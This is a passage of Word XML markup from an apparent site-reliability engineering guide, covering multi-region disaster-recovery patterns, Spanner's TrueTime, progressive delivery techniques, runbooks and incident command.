    <w:p w14:paraId="0E0FAD7F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The RPO-RTO cost matrix:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Zero RPO + zero RTO (no data loss, no downtime) is theoretically achievable but prohibitively expensive (synchronous multi-region replication, active-active in multiple regions, Anycast routing). Most systems make a pragmatic trade-off: RPO of seconds to minutes (async replication), RTO of minutes (automated failover).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7F95AA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-Region Architecture Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9D5AE5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pilot Light:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB4EF9D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The minimal multi-region configuration. In the secondary region, only the most critical core infrastructure runs (database replication target). Application tier is not running in the secondary — it exists only as AMIs, container images, and infrastructure-as-code templates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E592D81" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>On disaster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E339509" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="383"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Promote the secondary region's database replica to primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE97F0C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="383"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Spin up the application tier in the secondary region (using the pre-configured templates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BB9DBD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="383"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Update DNS to point to the secondary region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239F4636" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RTO: 30 minutes to 2 hours</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (application tier needs to spin up, warm up, and stabilize).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30554455" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Warm Standby:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522B4BFE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The secondary region runs a reduced-capacity version of the application tier (e.g., 10% of the primary's capacity). The database is a live replica. All infrastructure is running — just smaller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620F2451" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>On disaster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F1177B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="384"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Promote the secondary region's database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311EC4A4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="384"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Scale up the application tier in the secondary (auto-scaling from 10% to 100% capacity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046AA445" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="384"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Update DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2C92A2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RTO: 10–30 minutes</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (mostly waiting for auto-scaling to provision full capacity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0200BA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Active Multi-Region:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E2E265" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Both regions handle production traffic simultaneously. Users are routed to the nearest region via GeoDNS or Anycast. Database writes are either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09141C3B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="385"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Locally committed + async replicated</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (eventually consistent, writes can conflict).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638BA73F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="385"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Globally committed via distributed consensus</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (strongly consistent, adds cross-region latency to every write).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9C1558" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>On disaster: The failed region's traffic is automatically rerouted (BGP reconvergence for Anycast, DNS failover for GeoDNS). The surviving region absorbs 100% of traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EBBBAB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RTO: Seconds to minutes</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (routing reconvergence time). No manual intervention required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8B5BC5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The multi-region consistency challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C8DCD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Active-active with async replication (Cassandra multi-DC, DynamoDB global tables) uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eventual consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. Concurrent writes to the same data from different regions create </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>conflicts</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve"> resolved by last-write-wins (timestamp-based) or application-level </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>conflict resolution. For many workloads (user sessions, shopping carts, social media posts), eventual consistency is acceptable. For financial transactions (account balances, inventory counts), conflicts are unacceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE8C769" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google Spanner's solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> True global strong consistency using </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TrueTime</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — a globally synchronized clock with bounded uncertainty (±7ms). Spanner uses TrueTime to assign globally ordered timestamps to transactions. If transaction T1's commit timestamp's upper bound is less than transaction T2's timestamp's lower bound, T1 is guaranteed to precede T2 globally. This enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>external consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (linearizability) across global data centers with bounded latency overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20371476" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>TrueTime is implemented using GPS receivers and atomic clocks in every Google data center, plus a NTP-like protocol between data centers. The uncertainty bound (ε, typically ~7ms) means Spanner must </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wait ε milliseconds after acquiring a timestamp</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> before committing — ensuring no other transaction can have an earlier timestamp. This wait is Spanner's consistency tax for global strong consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C18BC85" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="0B2CC0FA">
          <v:rect id="_x0000_i2790" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C05295C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Human Factors in Reliability — The Largest Source of Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D108FC1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Studies consistently show that </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>human error causes 70–80% of production failures</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. Hardware fails. Software has bugs. But most major outages are triggered, extended, or worsened by human actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F67B715" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Change Management — The Reliability Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E75D8C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Every change is a reliability risk.</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Deployments, configuration changes, infrastructure modifications, database schema migrations, firewall rule updates — all are potential failure triggers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFC912F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Progressive delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> manages this risk by exposing changes to progressively larger populations, with automatic rollback if problems are detected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5AA34C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Canary deployment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Deploy the new version to 1% of instances. Route 1% of traffic to them. Monitor error rates, latency, and business metrics (conversion rate, revenue) for the canary vs the stable version. If canary metrics are worse than stable → automatic rollback. If equivalent or better → expand to 5%, 10%, 25%, 50%, 100%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423771C0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The comparison must be </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>statistically significant</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">. A canary with 1% of traffic needs enough samples to distinguish signal from noise. For a 0.1% error rate baseline, detecting a 10% increase in error rate (to 0.11%) requires ~10,000 samples per variant — at 1% of traffic, you need 1,000,000 total requests to reach statistical significance. This is why </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>canaries are held for </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>time-based minimums</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (e.g., 30 minutes, even if statistical significance is reached earlier — to catch failures that only manifest after warmup or under certain traffic patterns).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6413B61A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Feature flags:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Deploy code for a new feature to all instances but gate it behind a configuration flag. Enable the flag for 0.1% of users initially. Monitor. Expand. If problems arise, toggle the flag off — </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>instant rollback without redeployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (milliseconds, not minutes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633DFE1A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Dark launching:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Route a copy of production traffic to the new code path without returning the response to users. The new code path runs in "shadow mode" — its outputs are logged for comparison but discarded. This validates the new code's behavior and performance under real production traffic before it affects users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4A128C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Blue-green deployment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Maintain two identical environments (blue and green). Blue currently serves production traffic. Deploy new version to green. Test green thoroughly. Switch the load balancer from blue to green — </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>instantaneous cutover</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. Keep blue running for rollback (just switch the LB back). No gradual traffic shift, no mixed versions serving traffic simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B65C4E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The deployment reliability properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFFCED7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="386"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Canary: Gradual risk exposure, automatic rollback, requires statistical analysis tooling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AED1EB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="386"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Feature flags: Instant rollback, decouples deployment from release, requires flag management infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB7E69B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="386"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Dark launching: Zero user impact, thorough validation, consumes extra resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916B807" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="386"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Blue-green: Zero-downtime cutover, instant rollback, requires double infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579EB7CA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Runbooks — Operational Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD92A7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>runbook</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> is a documented procedure for handling a specific operational scenario. Runbooks are reliability infrastructure — they ensure any competent on-call engineer can execute the correct recovery procedure, not just the expert who designed the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EFFB70" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Runbook reliability properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718DF1BE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Executable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Each step must be specific enough to execute without interpretation. "Restart the payment service" is not executable. "SSH to payment-prod-01.internal, run sudo systemctl restart payment-service, verify with systemctl status payment-service | grep Active, confirm metric payment_service_up returns 1 in Grafana" is executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D80021A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tested:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Every runbook must be executed in a GameDay or drill. Runbooks written from memory are often wrong — the author remembers the intent, not the exact command with correct flags and arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD97DA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Versioned:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Runbooks must be version-controlled (Git). Changes to infrastructure must trigger runbook review. A runbook that describes a procedure for infrastructure that was replaced six months ago is worse than no runbook (false confidence).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A178280" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Measurable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Runbooks include expected outcomes and timing at each step. "The service should start within 30 seconds. If it hasn't started within 60 seconds, the issue is something else — escalate."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F64F74" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Incident response reliability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E52DEA5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>incident commander</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> role in an incident is specifically a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reliability role</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — their job is not to fix the problem but to ensure the organization's response to the problem is coordinated, efficient, and doesn't make things worse. The incident commander:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C34410D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="387"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Maintains situational awareness (what do we know, what are we doing, what's the user impact).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB052C8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="387"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Coordinates communication (status page updates, internal communication, customer communication).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6664B24C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="387"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Prevents multiple engineers from making conflicting changes simultaneously (the "too many cooks" failure mode).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40190053" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="387"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Tracks action items and ensures nothing falls through the cracks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2E4D84" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="387"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Calls the all-clear after mitigation and initiates the post-mortem process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6080DD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
